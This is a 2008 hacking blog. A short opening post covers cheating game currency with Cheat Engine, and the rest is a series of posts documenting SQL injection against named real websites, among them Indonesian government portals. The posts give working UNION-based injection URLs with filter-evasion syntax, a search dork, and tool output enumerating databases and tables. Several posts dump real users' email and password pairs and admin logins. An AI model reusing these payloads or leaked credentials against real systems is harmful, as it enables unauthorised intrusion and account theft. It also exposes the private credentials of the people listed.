viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, December 10, 2008

Pet Society - Hack Coins & Paw Points

6:41 PM Posted by viperfx07 6 comments
Tired of waiting your paw points & coins increased. Go see the videos and rage!!!

Hack Coins Video

Note:the code is: 840FFF85C12A0FF2
1st of all...tick all the boxes that is told u to do
2nd sell or buy anything *before us start the first scan*
and then do exactly what in the video
Download Cheat Engine: here


Hack Paw Points Video

Note:u can both hack ur paw points and ur trophies....u can also do it with Frisbee and the ball

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case, i'm tired being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)

PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*

Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/*

[-] [17:42:30]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 264

[0]mysql
[1]prod_collective
[2]prod_common
[3]prod_federated
[4]prod_postfix
[5]prod_stats
[6]prod_tmp
[7]prod_user0
[8]prod_user1
[9]prod_user10
[10]prod_user100
[11]prod_user101
[12]prod_user102
[13]prod_user103
[14]prod_user104
[15]prod_user105
[16]prod_user106
[17]prod_user107
[18]prod_user108
[19]prod_user109
[20]prod_user11
[21]prod_user110
[22]prod_user111
[23]prod_user112
[24]prod_user113
[25]prod_user114
[26]prod_user115
[27]prod_user116
[28]prod_user117
[29]prod_user118
[30]prod_user119
[31]prod_user12
[32]prod_user120
[33]prod_user121
[34]prod_user122
[35]prod_user123
[36]prod_user124
[37]prod_user125
[38]prod_user126
[39]prod_user127
[40]prod_user128
[41]prod_user129
[42]prod_user13
[43]prod_user130
[44]prod_user131
[45]prod_user132
[46]prod_user133
[47]prod_user134
[48]prod_user135
[49]prod_user136
[50]prod_user137
[51]prod_user138
[52]prod_user139
[53]prod_user14
[54]prod_user140
[55]prod_user141
[56]prod_user142
[57]prod_user143
[58]prod_user144
[59]prod_user145
[60]prod_user146
[61]prod_user147
[62]prod_user148
[63]prod_user149
[64]prod_user15
[65]prod_user150
[66]prod_user151
[67]prod_user152
[68]prod_user153
[69]prod_user154
[70]prod_user155
[71]prod_user156
[72]prod_user157
[73]prod_user158
[74]prod_user159
[75]prod_user16
[76]prod_user160
[77]prod_user161
[78]prod_user162
[79]prod_user163
[80]prod_user164
[81]prod_user165
[82]prod_user166
[83]prod_user167
[84]prod_user168
[85]prod_user169
[86]prod_user17
[87]prod_user170
[88]prod_user171
[89]prod_user172
[90]prod_user173
[91]prod_user174
[92]prod_user175
[93]prod_user176
[94]prod_user177
[95]prod_user178
[96]prod_user179
[97]prod_user18
[98]prod_user180
[99]prod_user181
[100]prod_user182
[101]prod_user183
[102]prod_user184
[103]prod_user185
[104]prod_user186
[105]prod_user187
[106]prod_user188
[107]prod_user189
[108]prod_user19
[109]prod_user190
[110]prod_user191
[111]prod_user192
[112]prod_user193
[113]prod_user194
[114]prod_user195
[115]prod_user196
[116]prod_user197
[117]prod_user198
[118]prod_user199
[119]prod_user2
[120]prod_user20
[121]prod_user200
[122]prod_user201
[123]prod_user202
[124]prod_user203
[125]prod_user204
[126]prod_user205
[127]prod_user206
[128]prod_user207
[129]prod_user208
[130]prod_user209
[131]prod_user21
[132]prod_user210
[133]prod_user211
[134]prod_user212
[135]prod_user213
[136]prod_user214
[137]prod_user215
[138]prod_user216
[139]prod_user217
[140]prod_user218
[141]prod_user219
[142]prod_user22
[143]prod_user220
[144]prod_user221
[145]prod_user222
[146]prod_user223
[147]prod_user224
[148]prod_user225
[149]prod_user226
[150]prod_user227
[151]prod_user228
[152]prod_user229
[153]prod_user23
[154]prod_user230
[155]prod_user231
[156]prod_user232
[157]prod_user233
[158]prod_user234
[159]prod_user235
[160]prod_user236
[161]prod_user237
[162]prod_user238
[163]prod_user239
[164]prod_user24
[165]prod_user240
[166]prod_user241
[167]prod_user242
[168]prod_user243
[169]prod_user244
[170]prod_user245
[171]prod_user246
[172]prod_user247
[173]prod_user248
[174]prod_user249
[175]prod_user25
[176]prod_user250
[177]prod_user251
[178]prod_user252
[179]prod_user253
[180]prod_user254
[181]prod_user255
[182]prod_user26
[183]prod_user27
[184]prod_user28
[185]prod_user29
[186]prod_user3
[187]prod_user30
[188]prod_user31
[189]prod_user32
[190]prod_user33
[191]prod_user34
[192]prod_user35
[193]prod_user36
[194]prod_user37
[195]prod_user38
[196]prod_user39
[197]prod_user4
[198]prod_user40
[199]prod_user41
[200]prod_user42
[201]prod_user43
[202]prod_user44
[203]prod_user45
[204]prod_user46
[205]prod_user47
[206]prod_user48
[207]prod_user49
[208]prod_user5
[209]prod_user50
[210]prod_user51
[211]prod_user52
[212]prod_user53
[213]prod_user54
[214]prod_user55
[215]prod_user56
[216]prod_user57
[217]prod_user58
[218]prod_user59
[219]prod_user6
[220]prod_user60
[221]prod_user61
[222]prod_user62
[223]prod_user63
[224]prod_user64
[225]prod_user65
[226]prod_user66
[227]prod_user67
[228]prod_user68
[229]prod_user69
[230]prod_user7
[231]prod_user70
[232]prod_user71
[233]prod_user72
[234]prod_user73
[235]prod_user74
[236]prod_user75
[237]prod_user76
[238]prod_user77
[239]prod_user78
[240]prod_user79
[241]prod_user8
[242]prod_user80
[243]prod_user81
[244]prod_user82
[245]prod_user83
[246]prod_user84
[247]prod_user85
[248]prod_user86
[249]prod_user87
[250]prod_user88
[251]prod_user89
[252]prod_user9
[253]prod_user90
[254]prod_user91
[255]prod_user92
[256]prod_user93
[257]prod_user94
[258]prod_user95
[259]prod_user96
[260]prod_user97
[261]prod_user98
[262]prod_user99
[263]test

[-] [17:47:11]
[-] Total URL Requests 266
[-] Done


[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:47:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing Tables & Columns from database "prod_collective"
[+] Number of Tables: 39

[Database]: prod_collective
[Table: Columns]
[0]g_accesscode: code,enabled,category,comment
[1]g_bookmark: row_id,user_id,message_id,group_id,bookmarked_flg,note,created,last_upd_tm
[2]g_digest_stats: user_id,updated,num_messages_displayed,proc_time_secs,num_groups,highlights_tm,new_msg_query_tm,total_digest_tm
[3]g_download_task_0: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[4]g_download_task_1: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[5]g_download_track: row_id,created,type,group_name,group_id,download_msg_count,status_nc,int_x1,int_x2,int_x3,int_x4,int_x5,char_x1,char_x2,char_x3,char_x4,char_x5
[6]g_downloadmsg_proc: row_id,created,start_tm,host,pid,type,group_name,username,comments
[7]g_email_to_author: row_id,created,recipient,recipient_email,recipient_id,subject,sender_id,template_code,msg_body
[8]g_gap: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[9]g_gap_20080630: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[10]g_gap_backup: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[11]g_gap_backup20080511: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[12]g_gap_backup20080611: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[13]g_gm_dedup: row_id,shard_num,gm_id
[14]g_group_auth: row_id,group_name,group_id,auth_code,auth_tm,lockout_upd_tm
[15]g_group_auth_track: row_id,created,group_auth_id,group_name,ip,desc_text
[16]g_group_c: row_id,name,state,msg_num_d,gap_checked_msg_num,lock_status,archived_resolved_flg,archived_msg_flg,msg_status_tm,lock_status_tm
[17]g_group_member_c: row_id,group_id,user_id,y_profile_flg,group_status_tm,group_status,email_fwd_flg,email_fwd_flg_tm,email,g_email_flg
[18]g_mail: row_id,created,mail_act_id,desc_text,comments,recipient_count,to_email,group_name,f_name,l_name,status,reminder_count,par_mail_id
[19]g_mail_act: row_id,created,user_id,template_id,act_code,user_email,group_count,register_code,mail_trackid,source_page,reminded_flg,ip,comments
[20]g_mail_response: row_id,created,ip,register_code,mail_track_id,action_nc
[21]g_mail_response_invalid: row_id,created,ip,register_code,mail_track_id,action_nc
[22]g_mail_template: row_id,created,last_upd,src_type_cd,custom_flg,status,subject,desc_text,tempting_text,comments,last_upd_by
[23]g_popular_group: row_id,group_id,group_name,rank
[24]g_rating: row_id,created,user_id,group_id,message_id,first_flg,rating,last_upd_tm
[25]g_refresh_q: row_id,created,user_id,host,process_id
[26]g_tag: row_id,created,user_id,group_id,message_id,tag,seq
[27]g_tip: row_id,tip_num,desc_text,created
[28]g_uauthor_obsolete: row_id,uname,status,status_tm,group_name,msg_num
[29]g_unarchive: row_id,created,group_name,group_id,req_tm,status,status_tm,start_tm,end_tm
[30]g_update: row_id,created,user_id,group_id,message_id,update_count,last_upd_tm
[31]g_user_c: row_id,group_sync_status,group_sync_status_tm,captcha_status,captcha_ip,captcha_status_tm,sync_req_tm,lock_status,lock_status_tm,y_password_status,y_password_status_tm,download_last_tm
[32]g_user_c2: row_id,created,ref_user_id
[33]g_user_c3: row_id,created,ref_user_id,login_tm
[34]g_user_delete: row_id,created,username,confirm_email,group_count,del_req_tm,status,status_tm
[35]g_user_stats: user_id,new_user_count,entry_count,new_user_count_7d,new_user_count_30d,new_user_count_all
[36]g_view: row_id,user_id,group_id,message_id,read_flg,view_count,created,last_upd_tm
[37]g_waitinglist: time,email
[38]g_webconn_proc: row_id,created,start_tm,host,pid,logic_proc_num,status,next_new_group_cycle,last_cycle,last_status,last_run_tm,last_duration,last_msg_count,scheduled_groups,finished_groups,ok_groups,noarchive_groups,overlimit_groups,invalidpass_groups,nonenglish_groups,triplenine_groups,captcha_groups,no_user_groups,server_error_groups,other_failed_groups,comments

[-] [17:55:42]
[-] Total URL Requests 393
[-] Done

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when i was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.

PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo: http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,user(),database(),version())--

Tools: schemafuzz.py v5.0
Admin page: http://www.faniq.com/admin/
Admin usr/pwd query:
- step 1 (get the member id with admin privilege): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,admin)+from+member_privs+where+admin=char(0x59)--

- step 2 (get email & password with member_id in step 1): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,email,password)+from+member+where+member_id=char(0x3134)--

Screenshot of admin page:


Database info:
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:40:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user-- [+] Do we have Access to Load_File: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)-- [-] [17:40:58] [-] Total URL Requests 3 [-] Done

[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:41:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 4

[0]FANIQ
[1]STATS
[2]mysql
[3]test

[-] [17:41:26]
[-] Total URL Requests 6
[-] Done

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Database info: [+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 20:20:43
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: broadsword
User: broadsword@localhost
Version: 4.1.22
[+] Dumping data from database "broadsword" Table "users"
[+] and Column(s) ['email', 'password']
[+] Number of Rows: 13

[0] sharon@broadsword.com.au:cameron:
[1] suzanne@broadsword.com.au:elise:
[2] drewp@broadsword.com.au:dr3w2006:
[3] ianf@broadsword.com.au:flett07:
[4] brain@broadsword.com.au:gus2208:
[5] gerald@broadsword.com.au:hockey1:
[6] castle@broadsword.com.au:col69:
[7] piers@broadsword.com.au:poohey:
[8] stuartk@broadsword.com.au:miranda1:
[9] dominicr@broadsword.com.au:zaq12wsx:
[10] pas.dimuccio@broadsword.com.au:sales2008:
[11] daniel.dixon@broadsword.com.au:sales2008:
[12] davidg@broadsword.com.au:sales:

[-] 20:20:46
[-] Total URL Requests 15
[-] Done

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.py
Admin page = http://www.highperformancesailing.com.au/admin/
Admin usr/pwd = admin:admin

Database info:
[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:12:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community

[Database]: sailing_hps
[Table: Columns]
[0]t_about: f_id,f_image,f_image2,f_title,f_content,f_content_small
[1]t_admin: f_id,f_username,f_password
[2]t_contact: f_id,f_address,f_phone,f_fax,f_email,f_post,f_map,f_content
[3]t_course: f_id,f_name,f_image,f_elements,f_content,f_content_small
[4]t_course_class2: f_id,f_coursid,f_name,f_image,f_content,f_elements
[5]t_course_class3: f_id,f_coursid,f_cours2id,f_name,f_image,f_content,f_elements
[6]t_link: f_id,f_name,f_type,f_image,f_url
[7]t_linktype: f_id,f_title
[8]t_news: f_id,f_title,f_content,f_addtime
[9]t_photo: f_id,f_title,f_image,f_content,f_addtime
[10]t_price: f_id,f_type,f_name,f_money
[11]t_price_type: f_id,f_title
[12]t_staff: f_id,f_name,f_job,f_intro,f_photo,f_addtime
[13]t_staff_match: f_id,f_staffid,f_year,f_type,f_match,f_city,f_country,f_place
[14]t_staff_title: f_id,f_staffid,f_certify,f_title
[15]t_testimonial: f_id,f_test,f_name,f_addtime

[-] [19:13:28]
[-] Total URL Requests 82
[-] Done


[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:14:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sailing_hps" Table "t_admin"
[+] Column(s) ['f_username', 'f_password']
[+] Number of Rows: 1

[0] admin:21232f297a57a5a743894a0e4a801fc3

[-] [19:14:43]
[-] Total URL Requests 3
[-] Done

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Admin page: http://www.westcare.com.au/admin/

[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:49:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community

[Database]: westcare_cms
[Table: Columns]
[0]code: id,class,description,value,sort_order,status,targetsite,parent_id
[1]main_category: id,description,value,site
[2]main_content: id,ver,author,title,category,description,body,displaydate,active,isdeleteable,iseditable,site
[3]menu: id,link,class,name,target,active,priority,root_id,parent_id,is_deletable,site
[4]news_category: id,description,value,site
[5]news_content: id,author,title,excerp,body,category,createddate,displaydate,expiresdate,updateddate,active,description,isdeleteable,site
[6]users: id,email,password,firstname,lastname,editorinterface,lastloggedin,active

[-] [18:49:44]
[-] Total URL Requests 63
[-] Done


[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:50:25
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community
[+] Dumping data from database "westcare_cms" Table "users"
[+] Column(s) ['email', 'password']
[+] Number of Rows: 2

[0] websupport@tsacorporation.com:ts@c0rp0r@ti0n:
[1] tanya.mcdonald@westcare.com.au:marketing:marketing:

[-] [18:50:26]
[-] Total URL Requests 4
[-] Done

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shw
PoC = http://www.site.com/news.php?p=shw&id=[SQLi]
Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--

Database structure:
[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 18:08:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: warne_warne
User: warne_warne@localhost
Version: 5.0.51a-community-log

[Database]: warne_warne
[Table: Columns]
[0]admin: adm_id,adm_email,adm_fname,adm_lname,adm_login,adm_pass
[1]articles: a_id,a_date,a_title,a_cat,a_desc,a_ftype,a_file,a_pub
[2]articles_cats: a_c_id,a_c_name
[3]articles_types: a_t_id,a_t_name,a_t_type,a_t_icon
[4]kid_casestudy: cs_id,cs_date,cs_name,cs_problem,cs_solution,cs_final,cs_logo,cs_image,cs_pub
[5]news: n_id,n_date,n_time,n_title,n_news,n_name,n_image,n_comm,n_pub
[6]news_comm: n_c_id,n_c_idnum,n_c_name,n_c_email,n_c_comm,n_c_date,n_c_time,n_c_pub
[7]pages: pg_id,pg_name,pg_title,pg_description,pg_keywords,pg_revisit,pg_content
[8]testimonials: test_id,test_date,test_name,test_cname,test_pos,test_testimony,test_pub

[-] [18:10:40]
[-] Total URL Requests 62
[-] Done


Admin page = http://www.site.com/admin/
Admin login default = bigkid:emijane[N]
Note: Replace [N] with 1 - 9

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]
Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--

Tools: RainbowCrack at irc.plain-text.info
Admin usr/pwd: admin:123qweasdzxc
Admin login page: http://www.imigrasi.co.id/login.php
Comment: mysql db can also be dumped.

Screenshot:



Sunday, November 16, 2008

[SQLi] http://www.dotaportal.com

10:14 AM Posted by viperfx07 No comments
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]

Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*

Database info:
[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 10:40:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dotaportal
User: dotaportal@192.168.10.21
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]dotaportal
[1]meetyourmakers

Friday, November 14, 2008

[SQLi] http://www.gunungkidulkab.go.id

1:58 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0
Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.php
Problem: can't login?

[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:17:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log


[Database]: dbportalgunungkidul
[Table: Columns]
[0]detail_kategori: id,idk,name
[1]detail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[2]kategori: id,name,keterangan
[3]petadetail_kategori: id,idk,name
[4]petadetail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[5]petakategori: id,name,keterangan
[6]t_content: content_id,kategori_id,subkategori_id,content_judul,content_deskripsi,content_isi,content_adafoto,content_file,content_tglentri,content_baca,content_isaktif,login
[7]t_footer: footer_id,footer_judul,footer_isaktif
[8]t_group: group_id,group_nama
[9]t_jenislink: jenislink_id,jenislink_nama,jenislink_isaktif
[10]t_kategori: kategori_id,posisimenu_id,kategori_urut,kategori_nama,kategori_isaktif
[11]t_linksite: linksite_id,jenislink_id,linksite_nama,linksite_situs,linksite_gambar,linksite_isaktif
[12]t_marquee: marquee_id,marquee_isi,marquee_isaktif
[13]t_posisimenu: posisimenu_id,posisimenu_nama,posisimenu_isaktif
[14]t_setinghome: setinghome_id,posisimenu_id,setinghome_urut,setinghome_subjek,setinghome_versi,setinghome_keterangan,setinghome_fileprogram,setinghome_filetemplate,setinghome_isaktif
[15]t_slogan: slogan_id,slogan_nama,slogan_foto,slogan_isaktif
[16]t_smsbaner: smsbaner_id,smsbaner_nama,smsbaner_foto,smsbaner_isaktif
[17]t_subkategori: subkategori_id,kategori_id,subkategori_urut,subkategori_nama,subkategori_isaktif,subkategori_file,subkategori_tinggigbr,subkategori_lebargbr,subkategori_adagbr
[18]tblbtamu: tblbtamu_id,tblbtamu_name,tblbtamu_email,tblbtamu_location,tblbtamu_url,tblbtamu_comment,tblbtamu_tanggal,tblbtamu_waktu,tblbtamu_ip
[19]tblbukutamu: tblbukutamu_id,tblbukutamu_ip,tblbukutamu_induk,tblbukutamu_nama,tblbukutamu_email,tblbukutamu_judul,tblbukutamu_isi,tblbukutamu_isaktif,tblbukutamu_tgljam
[20]tblcdiskusi: tblcdiskusi_id,tbldiskusi_id,tblcdiskusi_name,tblcdiskusi_email,tblcdiskusi_comment,tblcdiskusi_tanggal,tblcdiskusi_waktu
[21]tblcide: tblcide_id,tblide_id,tblcide_name,tblcide_email,tblcide_comment,tblcide_tanggal,tblcide_waktu
[22]tblcontent: tblcontent_id,tblweblayoutmenudetil_id,tblcontent_nama
[23]tbldiskusi: tbldiskusi_id,tbldiskusi_name,tbldiskusi_email,tbldiskusi_location,tbldiskusi_url,tbldiskusi_judul,tbldiskusi_comment,tbldiskusi_tanggal,tbldiskusi_waktu
[24]tblide: tblide_id,tblide_name,tblide_email,tblide_location,tblide_url,tblide_judul,tblide_comment,tblide_tanggal,tblide_waktu
[25]tblinfokecamatan: tblinfokecamatan_id,tblkecamatan_id,tblinfokecamatan_luas,tblinfokecamatan_petaadmin,tblinfokecamatan_jumpenduduk,tblinfokecamatan_kepadatan,tblinfokecamatan_pendapatanperkapita,tblinfokecamatan_potensi,tblinfokecamatan_rencanabangunkembang,tblinfokecamatan_rtmiskin,tblinfokecamatan_tanggal
[26]tblinstansi: tblinstansi_id,tbljnsinstansi_id,tblinstansi_nama
[27]tbljnsinstansi: tbljnsinstansi_id,tbljnsinstansi_nama
[28]tblkecamatan: tblkecamatan_id,tblkecamatan_nama
[29]tblkelompok: tblkelompok_id,tblkelompok_nama,tblkelompok_isaktif
[30]tblkelompoklink: tblkelompoklink_id,tblkelompoklink_nama,tblkelompoklink_url,tblkelompoklink_namafile,tblkelompoklink_isaktif
[31]tblkelompoksub: tblkelompok_id,tblkelompoksub_id,tblkelompoksub_keterangan,tblkelompoksub_namafile,tblkelompoksub_url,tblkelompoksub_isaktif
[32]tblkomentar: tblkomentar_id,tblbtamu_id,tblkomentar_name,tblkomentar_email,tblkomentar_location,tblkomentar_comment,tblkomentar_tanggal,tblkomentar_waktu,tblkomentar_ip
[33]tblkonkomentar: tblkonkomentar_id,tblkontak_id,tblkonkomentar_name,tblkonkomentar_email,tblkonkomentar_location,tblkonkomentar_comment,tblkonkomentar_tanggal,tblkonkomentar_waktu
[34]tblkontak: tblkontak_id,tblkontak_name,tblkontak_email,tblkontak_location,tblkontak_url,tblkontak_comment,tblkontak_tanggal,tblkontak_waktu
[35]tbllappengendalian: tbllappengendalian_id,tblinstansi_id,tbljnsinstansi_id,tbllappengendalian_keuanganjumdana,tbllappengendalian_keuangansasaran,tbllappengendalian_keuangansasaranpersen,tbllappengendalian_keuanganrealisasi,tbllappengendalian_keuanganrealisasipersen,tbllappengendalian_keuanganratos,tbllappengendalian_fisiktimbangsasaran,tbllappengendalian_fisiktimbangrealisasi,tbllappengendalian_fisikratos,tbllappengendalian_kondisibulanawal,tbllappengendalian_kondisibulanakhir,tbllappengendalian_tahunawal,tbllappengendalian_tahunakhir
[36]tblmenu: tblmenu_id,tblmenu_menu,tblmenu_level,tblmenu_induk,tblmenu_isaktif
[37]tblmulmed: tblmulmedinduk_id,tblmulmed_id,tblmulmed_judul,tblmulmed_deskripsi,tblmulmed_kapasitas,tblmulmed_namafile,tblmulmed_tanggal,tblmulmed_istayang
[38]tblmulmedinduk: tblmulmedinduk_id,tblmulmedinduk_kategori,tblmulmedinduk_istayang
[39]tblpengguna: tblpengguna_id,tblpengguna_login,tblpengguna_pass,tblpengguna_nama,tblgroup_id,tblpengguna_isaktif,tblpengguna_to
[40]tblsubcontent: tblsubcontent_id,tblcontent_id,tblsubcontent_nam,tblsubcontent_isi
[41]tblsubdomainlink: tblsubdomainlink_id,tblsubdomainlink_nama,tblsubdomainlink_url,tblsubdomainlink_namafile,tblsubdomainlink_isaktif
[42]tblweblayout: tblweblayout_id,tblweblayout_nama,tblweblayout_tglupdate,tblweblayout_namafile,tblweblayout_isaktif,tblpengguna_id
[43]tblweblayoutkontent: tblweblayoutkontent_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutkontent_urut,tblweblayoutkontent_judul,tblweblayoutkontent_isi,tblweblayoutkontent_tglupdate,tblweblayoutkontent_isfile,tblweblayoutkontent_namafile,tblweblayoutkontent_istayang,tblpengguna_id,tblweblayoutkontent_klik
[44]tblweblayoutmenu: tblweblayoutmenu_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_nama,tblweblayoutmenu_urut,tblweblayoutmenu_isaktif,tblpengguna_id
[45]tblweblayoutmenudetil: tblweblayoutmenudetil_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_nama,tblweblayoutmenudetil_urut,tblweblayoutmenudetil_induk,tblweblayoutmenudetil_isaktif,tblweblayoutmenudetil_home,tblweblayoutmenudetil_modetampil,tblpengguna_id,tblweblayoutmenudetil_privileges
[46]tblweblayoutmenudetilfile: tblweblayoutmenudetilfile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutmenudetilfile_ket,tblweblayoutmenudetilfile_namafile,tblpengguna_id
